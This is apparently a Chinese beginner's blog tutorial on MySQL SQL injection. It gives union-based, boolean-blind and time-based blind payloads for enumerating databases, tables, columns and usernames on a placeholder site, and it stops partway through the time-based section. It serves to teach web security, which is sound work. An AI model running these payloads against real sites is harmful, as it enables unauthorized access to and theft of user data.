<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/t.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/t-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/t-16x16-next.png">
  <link rel="mask-icon" href="/images/t-32x32-next.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('https://timorblog.cn').hostname,
    root: '/',
    scheme: 'Pisces',
    version: '7.6.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":true,"style":null},
    back2top: {"enable":true,"sidebar":true,"scrollpercent":true},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: false,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    comments: {"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":true},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}
  };
</script>

  <meta property="og:type" content="article">
<meta property="og:title" content="SQL注入">
<meta property="og:url" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db.html">
<meta property="og:site_name" content="Timorblog">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;1.jpg">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;2.png">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;3.png">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;4.png">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;5.png">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;6.png">
<meta property="og:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;7.png">
<meta property="article:published_time" content="2019-12-20T08:28:36.000Z">
<meta property="article:modified_time" content="2020-01-15T02:04:17.670Z">
<meta property="article:author" content="Timor">
<meta property="article:tag" content="SQL注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;timorblog.cn&#x2F;posts&#x2F;e73517db&#x2F;1.jpg">

<link rel="canonical" href="https://timorblog.cn/posts/e73517db.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>SQL注入 | Timorblog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Timorblog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <h1 class="site-subtitle" itemprop="description">一个学习安全的小白</h1>
      
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类<span class="badge">5</span></a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档<span class="badge">21</span></a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://timorblog.cn/posts/e73517db.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/xiaobai.jpg">
      <meta itemprop="name" content="Timor">
      <meta itemprop="description" content="渗透测试|网络安全|信息安全|WEB安全">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Timorblog">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          SQL注入
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-12-20 16:28:36" itemprop="dateCreated datePublished" datetime="2019-12-20T16:28:36+08:00">2019-12-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-01-15 10:04:17" itemprop="dateModified" datetime="2020-01-15T10:04:17+08:00">2020-01-15</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <img src="/posts/e73517db/1.jpg" class="" title="This is an 1 image">
<a id="more"></a>
<h2 id="了解SQL注入"><a href="#了解SQL注入" class="headerlink" title="了解SQL注入"></a>了解SQL注入</h2><h3 id="什么是SQL注入"><a href="#什么是SQL注入" class="headerlink" title="什么是SQL注入"></a>什么是SQL注入</h3><p>SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严，攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句，在管理员不知情的情况下实现非法操作，以此来实现欺骗数据库服务器执行非授权的任意查询，从而进一步得到相应的数据信息。</p>
<h3 id="SQL注入的危害"><a href="#SQL注入的危害" class="headerlink" title="SQL注入的危害"></a>SQL注入的危害</h3><p>攻击者通过SQL注入获取到服务器的库名、表名、字段名，从而获取到整个服务器中的数据，对网站用户的数据安全有极大的威胁。攻击者也可以通过获取到的数据，得到后台管理员的密码，然后对网页页面进行恶意篡改。这样不仅对数据库信息安全造成严重威胁，对整个数据库系统安全也影响重大。</p>
<h3 id="SQL的类型"><a href="#SQL的类型" class="headerlink" title="SQL的类型"></a>SQL的类型</h3><h4 id="按照注入点分类"><a href="#按照注入点分类" class="headerlink" title="按照注入点分类"></a>按照注入点分类</h4><ol>
<li>数字型注入:无需闭合 多为id?=1 and 1=1 –+</li>
<li>字符型注入:需要闭合 多为name=’admin’ and 1=1 #</li>
<li>搜索型注入:主要在数据搜索时没有过滤搜索参数search=’%搜索%’ and ‘%1%’=’%1%’</li>
</ol>
<h4 id="按照执行效果来分类"><a href="#按照执行效果来分类" class="headerlink" title="按照执行效果来分类"></a>按照执行效果来分类</h4><ul>
<li>基于布尔的盲注:根据页面返回结果判断条件真假注入</li>
<li>基于时间的忙著:根据页面响应时间判断条件真假注入</li>
<li>基于错误的注入:根据页面返回的错误信息查看数据库内容</li>
<li>联合查询注入:可以使用union查询数据库内容</li>
<li>堆查询注入:可以同时执行多条语句</li>
</ul>
<h4 id="按照数据请求方式来分类"><a href="#按照数据请求方式来分类" class="headerlink" title="按照数据请求方式来分类"></a>按照数据请求方式来分类</h4><p>GET注入：HTTP请求方式为get，注入点一般在get传入的参数部分。<br>POST注入：HTTP请求方式为post，注入点一般为提交的HTML表单，即post传入的数据内容。<br>HTTP头注入：HTTP的请求头存在注入点，例如XFF头，cookie，host这些都是常见的注入点。</p>
<h2 id="MySQL常用的系统函数"><a href="#MySQL常用的系统函数" class="headerlink" title="MySQL常用的系统函数"></a>MySQL常用的系统函数</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">version()                     #MySQL版本</span><br><span class="line">user()                        #数据库用户名</span><br><span class="line">database()                    #数据库名</span><br><span class="line">current_user()                #当前用户名</span><br><span class="line">system_user()                 #系统用户名</span><br><span class="line">session_user()                #连接数据库的用户名</span><br><span class="line">@@datadir                     #数据库路径</span><br><span class="line">@@version_compile_os          #操作系统版本</span><br><span class="line">@@basedir                     #数据库安装路径</span><br></pre></td></tr></table></figure>
<h2 id="联合查询注入"><a href="#联合查询注入" class="headerlink" title="联合查询注入"></a>联合查询注入</h2><p>联合查询注入利用的前提条件是有<code>显示位</code><br>显示位就是在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数据展示在页面中，这个展示数据的位置就叫显示位</p>
<h3 id="联合注入所用函数"><a href="#联合注入所用函数" class="headerlink" title="联合注入所用函数"></a>联合注入所用函数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">union           #union操作符用于连接两个以上的select语句的结果组合到一个结果集合中</span><br><span class="line">select          #select语句用于从数据库中选取数据</span><br><span class="line">order by        #order by 关键字默认按升序对结果进行排序</span><br><span class="line">group_concat()  #把括号内的值打印在一行,以逗号分隔,以升序排列</span><br><span class="line">from            #从</span><br><span class="line">where           #有条件地从表中选取数据</span><br></pre></td></tr></table></figure>

<h3 id="information-schema数据库说明"><a href="#information-schema数据库说明" class="headerlink" title="information_schema数据库说明"></a>information_schema数据库说明</h3><p>这是一个信息数据库,其中保存着其他数据库的数据库名，数据库的表名，数据库表里的列名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">information_schema.SCHEMATA表：提供了当前mysql中数据库的信息。</span><br><span class="line">information_schema.TABLES表：提供了数据库中表的信息。</span><br><span class="line">information_schema.COLUMNS表：提供了表中的列信息。</span><br><span class="line">table_schema:数据库名</span><br><span class="line">table_name:表名</span><br><span class="line">column_name:列名</span><br></pre></td></tr></table></figure>
<h3 id="联合注入的过程"><a href="#联合注入的过程" class="headerlink" title="联合注入的过程"></a>联合注入的过程</h3><ol>
<li>判断注入点</li>
<li>判断是整型还是字符型</li>
<li>判断查询列数</li>
<li>判断显示位</li>
<li>获取所有数据库名</li>
<li>获取数据库所有表名</li>
<li>获取字段名</li>
<li>获取字段中的数据</li>
</ol>
<h4 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h4><p>例：<a href="http://www.xxx.com/view?id=1" target="_blank" rel="noopener">www.xxx.com/view?id=1</a><br>可以使用 <code>and 1=1</code> 和<code>and 1=2</code>  根据页面的不同判断（整形判断）</p>
<img src="/posts/e73517db/2.png" class="" title="This is an 2 image">
<img src="/posts/e73517db/3.png" class="" title="This is an 3 image">
<p>还可以使用 单引号<code>&#39;</code>判断显示数据库错误信息或者页面回显不同（整形字符串类型的判断） </p>
<img src="/posts/e73517db/4.png" class="" title="This is an 4 image">
<h4 id="判断是整型还是字符型"><a href="#判断是整型还是字符型" class="headerlink" title="判断是整型还是字符型"></a>判断是整型还是字符型</h4><p>输入<code>and 1=1</code>和<code>and 1=2</code>后发现页面变化，判断为整型注入<br>后台代码为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">输入&#96;&#39; and 1&#x3D;1 %23&#96;和 &#96;&#39; and 1&#x3D;2%23&#96;后发现页面变化，判断为字符注入</span><br><span class="line">后台代码为：</span><br><span class="line">&#96;&#96;&#96;$sql&#x3D;&quot;SELECT * FROM users WHERE id&#x3D;&#39;$id&#39; LIMIT 0,1&quot;;</span><br></pre></td></tr></table></figure>
<h4 id="判断查询列数"><a href="#判断查询列数" class="headerlink" title="判断查询列数"></a>判断查询列数</h4><p>order by 函数是对MySQL中查询结果按照指定字段名进行排序，除了指定字 段名还可以指定字段的栏位进行排序，第一个查询字段为1，第二个为2，依次 类推。我们可以通过二分法来猜解列数</p>
<p>输入 <code>order by 4%23</code>  发现页面错误，说明没有4列</p>
<img src="/posts/e73517db/5.png" class="" title="This is an 5 image">
<p>输入3列时，页面正常，说明有3列</p>
<img src="/posts/e73517db/6.png" class="" title="This is an 6 image">
<h4 id="判断显示位"><a href="#判断显示位" class="headerlink" title="判断显示位"></a>判断显示位</h4><p>例 <a href="http://www.xxx.com/view?id=1" target="_blank" rel="noopener">www.xxx.com/view?id=1</a><br>使union前面的语句报错，执行后面的，爆出显示位，2，3</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">www.xxx.com/view?id=-<span class="number">1</span> <span class="class"><span class="keyword">union</span> <span class="title">select</span> 1,2,3</span></span><br></pre></td></tr></table></figure>

<img src="/posts/e73517db/7.png" class="" title="This is an 7 image">
<h4 id="获取所有数据库名"><a href="#获取所有数据库名" class="headerlink" title="获取所有数据库名"></a>获取所有数据库名</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% asset_img 8.png This is an 8 image %&#125;</span><br><span class="line">#### 获取数据库所有表名</span><br></pre></td></tr></table></figure>
<p><a href="http://www.xxx.com/view?id=-1" target="_blank" rel="noopener">www.xxx.com/view?id=-1</a> union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’库名’</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% asset_img <span class="number">9.</span>png This is an <span class="number">9</span> image %&#125;</span><br><span class="line">#### 获取字段名</span><br></pre></td></tr></table></figure>
<p><a href="http://www.xxx.com/view?id=-1" target="_blank" rel="noopener">www.xxx.com/view?id=-1</a> union select 1,2,group_concat(column_name) from information_schema.columns where table_name=’表名’</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#123;% asset_img <span class="number">10.</span>png This is an <span class="number">10</span> image %&#125;</span><br><span class="line">#### 获取字段中的数据</span><br></pre></td></tr></table></figure>
<p><a href="http://www.xxx.com/view?id=-1" target="_blank" rel="noopener">www.xxx.com/view?id=-1</a> union select 1,2,group_concat(username) from 字段名</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% asset_img <span class="number">11.</span>png This is an <span class="number">11</span> image %&#125;</span><br><span class="line">## 基于布尔的盲注</span><br><span class="line">页面中没有显示位，没有输出SQL语句执行错误信息，只能通过页面返回正常不正常。</span><br><span class="line">### 布尔盲注所用函数</span><br><span class="line">MYSQL的substr函数的使用</span><br></pre></td></tr></table></figure>
<p>格式：SUBSTR(string,start,len)<br>含义：从string的start位开始截取len个字符</p>
<figure class="highlight cos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MYSQL的<span class="keyword">ascii</span>函数的使用</span><br></pre></td></tr></table></figure>
<p>格式：ASCII(char)<br>含义：将char转化成ascii码 </p>
<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">MYSQL的<span class="built_in">length</span>函数的使用</span><br></pre></td></tr></table></figure>
<p>格式：length(str)<br>含义：返回str字符串的长度</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">首先要记得常见的ASCII，[A-Z]:[<span class="number">65</span><span class="number">-90</span>], [a-z]:[<span class="number">97122</span>], [<span class="number">0</span><span class="number">-9</span>]:[<span class="number">48</span><span class="number">-57</span>]</span><br><span class="line">### 布尔盲注过程</span><br><span class="line">#### 猜库</span><br><span class="line">##### 猜数据库名的长度</span><br></pre></td></tr></table></figure>
<p>and length(database())=8  –+</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">##### 猜数据库名的第一个字符</span><br></pre></td></tr></table></figure>
<p>and ascii(substr(database(),1,1)) = 115 –+<br>猜数据库名的第二个字符就要把substr(database(),2,1)修改</p>
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#### 猜表</span><br><span class="line">##### 猜表的数量</span><br></pre></td></tr></table></figure>
<p>and(select count(table_name) from information_schema.tables where table_schema = database()) = 4 –+</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">##### 猜表的长度</span><br><span class="line">``` </span><br><span class="line"><span class="keyword">and</span> length(substr((<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">6</span> <span class="comment">--+ </span></span><br><span class="line">如果猜第二个表的长度就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h5 id="猜表名的第一个字符"><a href="#猜表名的第一个字符" class="headerlink" title="猜表名的第一个字符"></a>猜表名的第一个字符</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span>(ascii(substr((<span class="keyword">select</span> <span class="built_in">table_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>() <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))) =<span class="number">101</span> <span class="comment">--+</span></span><br><span class="line">如果猜表名的第二个字符就替换 substr(*,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line">如果猜第二个表名的第一个字符就替换 <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="猜列"><a href="#猜列" class="headerlink" title="猜列"></a>猜列</h4><h5 id="猜列的数量"><a href="#猜列的数量" class="headerlink" title="猜列的数量"></a>猜列的数量</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (<span class="keyword">select</span> count(<span class="built_in">column_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'表名'</span>) =<span class="number">3</span> <span class="comment">--+</span></span><br><span class="line">因为已知表名 所以直接查</span><br></pre></td></tr></table></figure>
<h5 id="猜第一个列名的长度"><a href="#猜第一个列名的长度" class="headerlink" title="猜第一个列名的长度"></a>猜第一个列名的长度</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> length(substr((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'表名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">2</span> <span class="comment">--+</span></span><br><span class="line">如果猜第二个列的长度就替换<span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h5 id="猜第一个列名的第一个字符"><a href="#猜第一个列名的第一个字符" class="headerlink" title="猜第一个列名的第一个字符"></a>猜第一个列名的第一个字符</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"> <span class="keyword">and</span>(ascii(substr((<span class="keyword">select</span> <span class="built_in">column_name</span> <span class="keyword">from</span> information_schema.<span class="keyword">columns</span> <span class="keyword">where</span> <span class="built_in">table_name</span>=<span class="string">'表名'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>)))=<span class="number">105</span> <span class="comment">--+</span></span><br><span class="line">如果猜列名的第二个字符就替换 substr(*,<span class="number">2</span>,<span class="number">1</span>)</span><br><span class="line">如果猜第二个列名的第一个字符就替换 <span class="keyword">limit</span> <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h4 id="猜数据"><a href="#猜数据" class="headerlink" title="猜数据"></a>猜数据</h4><h5 id="猜数据的数量"><a href="#猜数据的数量" class="headerlink" title="猜数据的数量"></a>猜数据的数量</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> (<span class="keyword">select</span> count(列名) <span class="keyword">from</span> 表名)=<span class="number">13</span> <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<h5 id="猜第一个数据的长度"><a href="#猜第一个数据的长度" class="headerlink" title="猜第一个数据的长度"></a>猜第一个数据的长度</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> length(substr((select 列名 <span class="keyword">from</span> 表名 limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>))=<span class="number">4</span> --+</span><br><span class="line">如果猜第二个数据的长度就替换limit <span class="number">1</span>,<span class="number">1</span></span><br></pre></td></tr></table></figure>
<h5 id="猜第一个数据的第一个字符"><a href="#猜第一个数据的第一个字符" class="headerlink" title="猜第一个数据的第一个字符"></a>猜第一个数据的第一个字符</h5><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> ascii(substr((select username <span class="keyword">from</span><span class="built_in"> users </span>limit 0,1),1)) =68 --+</span><br><span class="line">如果要猜第一个数据的第二个字符就把substr(*,2,1)替换</span><br><span class="line">如果要猜第二个数据的第一个字符就替换limit 1,1</span><br></pre></td></tr></table></figure>
<h2 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h2><p>页面没有显示位，也没有输出SQL语句执行错误信息。正确的SQL语句和错误的SQL语句返回的页面都一样，但是加入sleep(5)条件后，页面的返回速度明显慢了5秒。</p>
<h3 id="时间盲注所用函数"><a href="#时间盲注所用函数" class="headerlink" title="时间盲注所用函数"></a>时间盲注所用函数</h3><p>MYSQL的substr函数的使用</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">格式：SUBSTR(<span class="keyword">string</span>,<span class="built_in">start</span>,<span class="built_in">len</span>)</span><br><span class="line">含义：从<span class="keyword">string</span>的<span class="built_in">start</span>位开始截取<span class="built_in">len</span>个字符</span><br></pre></td></tr></table></figure>
<p>MYSQL的ascii函数的使用</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">格式：ASCII(<span class="type">char</span>) </span><br><span class="line">含义：将<span class="type">char</span>转化成ascii码</span><br></pre></td></tr></table></figure>
<p>MYSQL的length函数的使用</p>
<figure class="highlight hsp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">格式：<span class="keyword">length</span>(<span class="keyword">str</span>)</span><br><span class="line">含义：返回<span class="keyword">str</span>字符串的长度</span><br></pre></td></tr></table></figure>
<p>首先要记得常见的ASCII，[A-Z]:[65-90], [a-z]:[97122], [0-9]:[48-57]</p>
<h3 id="时间盲注过程"><a href="#时间盲注过程" class="headerlink" title="时间盲注过程"></a>时间盲注过程</h3><h4 id="检测注入"><a href="#检测注入" class="headerlink" title="检测注入"></a>检测注入</h4><figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">and sleep(<span class="number">5</span>) --+</span><br><span class="line">and <span class="keyword">if</span>(<span class="number">1</span>=<span class="number">0</span>,<span class="number">1</span>, sleep(<span class="number">10</span>)) --+</span><br><span class="line">``` </span><br><span class="line">#### 猜库</span><br><span class="line">##### 猜数据库名的长度</span><br><span class="line">```and <span class="keyword">if</span>(length(database())=<span class="number">8</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) --+</span><br></pre></td></tr></table></figure>
<h5 id="猜数据库名的第一个字符"><a href="#猜数据库名的第一个字符" class="headerlink" title="猜数据库名的第一个字符"></a>猜数据库名的第一个字符</h5><figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>(ascii(substr(database(),<span class="number">1</span>))=<span class="number">115</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) --+</span><br><span class="line">猜数据库名的第二个字符就要把substr(database(),<span class="number">2</span>,<span class="number">1</span>)修改</span><br></pre></td></tr></table></figure>
<h4 id="猜表"><a href="#猜表" class="headerlink" title="猜表"></a>猜表</h4><h5 id="猜表的数量"><a href="#猜表的数量" class="headerlink" title="猜表的数量"></a>猜表的数量</h5><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">and</span> <span class="keyword">if</span>((<span class="keyword">select</span> count(<span class="built_in">table_name</span>) <span class="keyword">from</span> information_schema.<span class="keyword">tables</span> <span class="keyword">where</span> table_schema=<span class="keyword">database</span>())=<span class="number">4</span>,sleep(<span class="number">5</span>),<span class="number">1</span>) <span class="comment">--+</span></span><br></pre></td></tr></table></figure>
